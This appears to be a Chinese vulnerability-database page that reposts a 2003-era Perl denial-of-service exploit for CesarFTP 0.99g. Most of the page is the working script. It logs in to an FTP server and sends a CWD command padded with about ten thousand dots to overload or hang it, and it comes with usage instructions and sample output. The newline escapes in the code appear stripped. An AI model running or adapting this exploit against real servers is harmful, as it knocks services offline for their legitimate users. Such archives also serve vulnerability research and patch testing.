CesarFTP 0.99 g – Remote CWD Denial of Service
| 漏洞ID | 1053797 | 漏洞类型 | |
| 发布时间 | 2003-03-30 | 更新时间 | 2003-03-30 |
![图片[1]-CesarFTP 0.99 g – Remote CWD Denial of Service-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-CesarFTP 0.99 g – Remote CWD Denial of Service-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Windows | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7950/info
A vulnerability has been reported for CesarFTP. Reportedly, an attacker may crash a target server by supplying excessive data as the argument to the 'CWD' command. This may result in the server hanging, effectively denying service to other legitimate FTP users.
#!/usr/bin/perl -w
use IO::Socket;
########################################
# _ _
# ____ (_) | |__
# |_ / | | | '_
# / / | | | |_) |
# /___| |_| |_.__/
#
# http://coding.romainl.com/
#
########################################
##
########################################
## tested on CesarFTP 0.99g + WindowsXP Sp1
##
## server : 127.0.0.1
## user : zib
## pass : zib
##
##$ perl expl.pl localhost zib zib
##
##server : localhost
##user : zib
##pass : zib
##
##[~] prepare to connect...
##[+] connected
##[~] prepare to send data...
##[+] success
##[~] Send CPU Overload Sequence...
##[+] CPU Overload Sequence sent
##$
########################################
if (@ARGV < 3)
{
print "#############################################################n";
print " CesarFTP 0.99g : CPU Overloadn";
print " by zib http://coding.romainl.com/ n";
print " 22/12/03n";
print "#############################################################n";
print " Usage:n";
print " cesar0.99g_dos.pl <host> <user> <pass>n";
print "n";
print " <host> - host for attackn";
print " <user> - a valid ftp user account, could be anonymousn";
print " <pass> - pass for the loginn";
print "#############################################################";
exit();
}
$server = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$nb = 10000;
print "n";
print "server : $servern";
print "user : $usern";
print "pass : $passn";
print "n";
$i = 0;
print "[~] prepare to connect...n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort
=> "21") ||
die "[-] connect failedn";
print "[+] connectedn";
print "[~] prepare to send data...n";
print $socket "USER $usern";
print $socket "PASS $passn";
print "[+] successn";
print "[~] Send CPU Overload Sequence...n";
print $socket "CWD ";
for($i=0;$i<=$nb;$i=$i+1)
{
print $socket ".";
}
print $socket "n";
print "[+] CPU Overload Sequence sentn";相关推荐: Smart Search 4.25 – Remote Command Execution
Smart Search 4.25 – Remote Command Execution 漏洞ID 1053671 漏洞类型 发布时间 2003-01-05 更新时间 2003-01-05 CVE编号 N/A CNNVD-ID N/A 漏洞平台 CGI CVS…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666